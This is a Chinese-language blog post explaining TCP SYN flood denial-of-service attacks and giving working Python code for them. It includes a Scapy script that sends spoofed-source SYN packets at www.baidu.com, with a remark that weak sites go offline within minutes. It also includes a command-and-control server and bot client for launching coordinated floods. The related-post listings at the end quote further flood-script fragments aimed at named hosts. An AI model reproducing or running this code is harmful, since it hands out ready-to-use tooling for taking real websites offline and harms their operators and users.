Python-DDoS攻击

最新推荐文章于 2024-09-22 16:52:31 发布
最新推荐文章于 2024-09-22 16:52:31 发布
阅读量7.6k 收藏 76
点赞数 7
分类专栏: ddos 文章标签: ddos

 

 

python-DDoS攻击

 

背景:

网络传输层中,一般采用TCP协议,如果要建立连接,客户端会先发送syn包请求,服务器接收,接收后,再传递给客户端ack,syn包,这个时候,客户端再次回应,传回ack包。可是问题就出在,如果我是客户端,只发送一个请求syn包,然后第三次握手的时候,不再往回传ack包,此时服务端是不是就要等待?

在等待的时间里,我是不是可以伪造更多的请求,从而不断消耗服务器的资源,然后直到最后服务器停止服务为止?

上述这种攻击就是syn泛洪攻击。

 

python中scapy库来实现syn泛洪攻击:

python3安装方式:
sudo pip3 install scapy-python3

注意:scapy库的代码必须运行在root权限下

 

基本用法:

from scapy.all import *
#  定义一个syn包,其中的格式如下:IP()/TCP(),IP中的src为自己的伪造的ip,dst为目标ip,
#  TCP中的dport为目标端口号,网络中普遍为80,flages=‘S’这里的s代表设置的是syn包
pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")
#  发送包,直接用send
send(pkt)

 

具体来一个例子:

#!/usr/bin/env python3
import random
import socket
import time
from scapy.all import *

#  定义syn洪流函数,tgt为目标ip,dPort为目标端口
def synFlood(tgt,dPort):
    #  先任意伪造4个ip地址
    srcList = ['11.1.1.2','22.1.1.102','33.1.1.2',
               '125.130.5.199']
    #  选择任意一个端口号
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        #  类似上面那个代码构造IP/TCP包,然后send
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort,flags='S')
        packet = ipLayer/tcpLayer
        send(packet)
  
domain = "www.baidu.com" #定义你想攻击的域名,不建议是百度哈,别怪我没提醒
tgt = socket.gethostbyname(domain)  #利用socket的方法获取域名的ip地址,即dns解析
print(tgt) # 可以打印出来看一下
dPort = 80 # 网络传输常用端口号
synFlood(tgt,dPort) #调用syn洪流函数,然后发送syn包
#  发送完后就可以去看看这个服务器的响应速度了。一般是持续发送几分钟,这个网站就访问不了了
#  前提是这个网站很渣。。哈哈

DDoS攻击

而DDoS攻击是啥?其实就类似上面这个syn洪流,只是DDoS采用的是多个客户端在服务器的命令下,一起像一个网站攻击,类似这样

其实现原理跟syn是一样的,只是他采用了服务端可以直接控制客户端然后发出请求。

具体的服务端与客户端代码我就直接帖上了

服务端:

import socket
import argparse
import threading

socketList = []

#  发送命令到所有的客户机上
def sendCmd(cmd):
    print('Send command....')
    for sock in socketList:
        sock.send(cmd.encode())

#  等待连接,将建立好的连接加入到socketList列表中
def waitConnect(s):
        while True:
            sock, addr = s.accept()
            if sock not in socketList:
                socketList.append(sock)

def main():
    #  创建tcp服务端
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)  #设置端口重用
    s.bind(('0.0.0.0',58868))  
    s.listen(1024)

    #  线程创建等待连接请求
    t = threading.Thread(target=waitConnect, args=(s,))
    t.start()

    print("Wait at least a client connection!")
    while not len(socketList):  # 没有连接则一直等待
        pass
    print("It has been a client connection")

    while True:
        print('='*50)
        #  命令格式
        print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c start"')
        #  等待输入命令
        cmd_str = input('please input cmd:')
        if len(cmd_str):
            if cmd_str[0] == '#':
                sendCmd(cmd_str)

if __name__ == '__main__':
    main()

客户端:

import argparse
import socket
import sys
import os
from multiprocessing import Process
import random
from scapy.all import *

curProcess = None

#  SYN泛洪攻击,就是最开始的那串代码,直接copy过来就好
def synFlood(tgt, dPort):
    print("="*100)
    print("The syn flood is running")
    print('='*100)

    srcList = ['11.1.1.2', '10.1.1.102', '33.1.1.2',
               '125.130.5.199']
    #  任意一个端口号
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer / tcpLayer
        send(packet)

def cmdHandle(sock, parser):
    global curProcess
    while True:
        data = sock.recv(1024).decode()
        if len(data) == 0:
            print('The data is empty')
            return
        if data[0] == '#':
            try:
                # 解析命令
                options = parser.parse_args(data[1:].split())

                m_host = options.host
                m_port = options.port
                m_cmd = options.cmd
                # print(m_cmd)

                #  DDOS启动命令
                if m_cmd.lower() == 'start':
                    if curProcess !=None and curProcess.is_alive():
                        curProcess.terminate()
                        curProcess = None
                        os.system('clear')
                    print('The synFlood is start')
                    p = Process(target=synFlood, args = (m_host, m_port))
                    p.start()
                    curProcess = p
                elif m_cmd.lower() == 'stop':
                    if curProcess.is_alive():
                        curProcess.terminate()
                        os.system('clear')
            except:
                print("Failed to perform the command")


def main():
    #  添加需要解析的命令,就是服务器发送过来的命令
    #  命令格式:"#-H xxx.xxx.xxx.xxx -p xxxx -c start"
    p = argparse.ArgumentParser()
    p.add_argument('-H', dest='host', type=str)
    p.add_argument('-p', dest='port',type=int)
    p.add_argument('-c', dest='cmd', type=str)
    print("*" * 40)

    try:
        #  创建socket对象
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 这里因为是在本地,所以连接的ip地址为本地ip地址127.0.0.1,端口为服务器端口       
        s.connect(('127.0.0.1',58868))  
        
        print('To connected server was success')
        print("=" * 40)

        #  处理命令
        cmdHandle(s, p)

    except Exception as e:
        print('The network connected failed')
        print('please restart the script')
        sys.exit(0)


if __name__ == '__main__':
    main()

然后到这里就可以在本地先开启服务端,再开启客户端来实现了哈

记得用sudo哈

当看到客户端是这样的时候

哈哈,完成了。

 

不过,其实质是跟syn洪流一样哈。只是多了一个包装而已。

 

END

 

 

星河_赵梓宇
关注
专栏目录
pythonDDOS攻击
吃不胖.
09-24 481
攻击者发送的SYN报文通常是伪造的,其源IP地址被设置为虚假的IP地址,从而使受害者无法正确地响应连接请求,产生大量的半开连接状态,最终导致目标系统资源耗尽。针对不同的DDOS攻击方式,采取不同的防御措施。UDP协议是一种无连接的协议,没有连接建立和断开的过程,因此攻击者可以在短时间内向目标主机连续发送大量的UDP包,导致目标主机的带宽、CPU等资源疲于应付,最终导致服务拒绝。DDOS攻击对目标系统的危害非常大,不仅会造成服务的中断和降低网站的性能,还可能导致重要数据的泄露和系统的崩溃。
pythonDDOS攻击
m737238376373的博客
05-18 5837
构建多个socket链接后,每个socket对这个网站无限的发送信息,一个死循环,以起到占用他们网站资源链接的效果 环境: python3.7 代码: import socket import time import threading MAX_CONN = 200000 # 最大连接数 PORT = 80 HOST = "mooc.jikestar.com" # 目标IP或域名. PAGE = "/#/classlist" # 目标页面 buf = ("POST %s...
python如何编写ddos_python写一个DDos脚本(DOS)
weixin_39852688的博客
11-20 988
前言:突然想写,然后去了解原理DDOS原理:往指定的IP发送数据包(僵尸网络),导致服务器拒绝服务,无法正常访问。0x01:要用到的模块scapy模块pip install scapy或:https://github.com/phaethon/scapy下载setup.py然后执行python setup.py install系统环境:kali Linuxwindows会报模块缺少还有一个162行...
python网络渗透之:DOS攻击篇_ddos攻击脚本
最新发布
2401_87298999的博客
09-22 1142
返回攻击脚本的log界面及使用说明。
python ddos
Halfopen的专栏
06-09 1511
#!/usr/bin/env python import socket import time import threading #Pressure Test,ddos tool #--------------------------- MAX_CONN=20000 PORT=80 HOST="www.baidu.com" PAGE="/index.php" #------------------
Python实现DDOS攻击
weixin_42660646的博客
08-25 8368
Socket 套接字(socket)是一个抽象层,应用程序可以通过它发送或接收数据,可对其进行像对文件一样的打开、读写和关闭等操作。套接字允许应用程序将I/O插入到网络中,并与网络中的其他应用程序进行通信。网络套接字是IP地址与端口的组合。 使用Python socket自带库发送数据包 import socket #一句话导入socket库 import random #下面要构建数...
python3网站攻击_python-DDoS攻击
weixin_39827589的博客
11-20 782
背景:网络传输层中,一般采用TCP协议,如果要建立连接,客户端会先发送syn包请求,服务器接收,接收后,再传递给客户端ack,syn包,这个时候,客户端再次回应,传回ack包。可是问题就出在,如果我是客户端,只发送一个请求syn包,然后第三次握手的时候,不再往回传ack包,此时服务端是不是就要等待?在等待的时间里,我是不是可以伪造更多的请求,从而不断消耗服务器的资源,然后直到最后服务器停止服务为止...
python实现的防DDoS脚本
01-21
这篇博可以说连开场白都可以省掉了,之所以被DDoS,并不是因为惹了疯狗被追着咬,而是因为VC悲剧之后流量全到simplecd来了。 不仅如此,一些笨蛋们在抓站,一些笨蛋们在用迅雷下载,100Mbps的端口居然已经满负荷运作...
Python-UDP-Flood:使用 python 进行的非常基本的 DOS 攻击
05-29
可以使用多台计算机将其转换为DDOS攻击。 我不对您使用此程序提供的使用负责。 它支持UDP和TCP 用法 下载或复制rundos.sh的脚本 也许你应该这样才能让它发挥作用。 chmod +x rundos.sh 自动安装脚本 wget -O ...
chatgpt赋能Python-pythonddos
www_xuhss_com的博客
05-21 573
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
Python 之 源代码 DDOS攻击
君逍遥o
10-26 3449
Python;源代码;DDOS攻击
Python攻击
weixin_33842328的博客
04-14 420
python DOS攻击 2版本 #!/usr/bin/env python import socket import time import threading #Pressure Test,ddos tool #--------------------------- MAX_CONN=10 PORT=80 HOST="10.0.0.6" PAGE="/index...
PythonDDos
w666ssyyjj的博客
01-31 1050
ddosDDOS
pythonddos攻击代码_Python基于http的ddos攻击代码
weixin_39924584的博客
11-25 1382
基于http的ddos,主要就是靠占用连接数达到攻击目标,但也非常危险,会暴露攻击者的ip,慎用#!/usr/bin/env pythonimport socketimport timeimport threading#Pressure Test,ddos tool#---------------------------MAX_CONN=20000PORT=80HOST="www.baidu.co...
python ddos攻击_pythonDDos攻击
weixin_39743369的博客
11-20 180
Python,3.7的,不谢import socketimport timeimport threading#Pressure Test,ddos tool#---------------------------MAX_CONN=20000PORT=80HOST=""//输入你要攻击的IP或域名PAGE="/index.php"#---------------------------buf=("...
PythonDDOS代码
qq_42065719的博客
09-21 2200
下一个Python3.7.0-3.7.3 代码:du import socket import time import threading #Pressure Test,ddos tool #--------------------------- MAX_CONN=20000 PORT=80 HOST="baidu.com"#在双引号里输入对zhi方IP或域名,要保证他联网了dao或开机了,这里拿百度示范(别运行!不然后果自负!!) PAGE="/index.php" #-----
如何用Python进行DDOS攻击?【网络攻防篇】
qq_68725483的博客
10-21 742
【代码】如何用Python进行DDOS攻击?【网络攻防篇】
python网络渗透之:DOS攻击篇
hih30250的博客
12-18 3638
Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。Smurf攻击的原理是利用了ICMP Echo Request消息(即Ping请求),当有大量的Echo Request消息被发送到网上广播地址(Broadcast Address),所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息(即Ping响应)。
Python实现DDos攻击实例详解
2301_80240808的博客
11-27 3474
SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式。我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手
Python简易DDos攻击器源码
06-27
<< 很抱歉,但我不能提供关于创建或使用DDoS(分布式拒绝服务)攻击工具的信息,因为这种行为是非法和有害的,违反网络安全政策,并可能导致严重的法律后果。我的设计目的是为用户提供有用的技术支持和教育,而不涉及任何恶意活动。 如果你对网络安全、编程技术有其他非攻击性的学习需求,我会很乐意帮助解答相关的问题,比如Python基础知识、网络编程等。请提问其他安全性和合法的主题,我会很高兴提供帮助。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值